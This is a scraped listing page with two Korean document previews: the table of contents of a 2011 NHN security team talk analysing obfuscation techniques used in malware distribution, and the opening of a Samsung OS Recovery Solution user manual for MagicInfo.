악성코드유포에홗용되는 난독화기법분석 이민섭 NBP 포털서비스보앆팀 c 2011 NHN CORPORATION 목차 1. 악성코드유포및감염 2. 최근웹사이트공격동향 3. 난독화공격코드 3.1 난독화에대한정의 3.2 공격코드의난독화주요방법 3.3 난독화공격코드사례 4. 악성코드바이너리의특징과목적 5. 결롞 1. 악성코드유포및감염 1. 악성코드유포및감염 이메일첨부파일을이용한악성코드유포
More informationSystem Recovery 사용자 매뉴얼
Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.
More information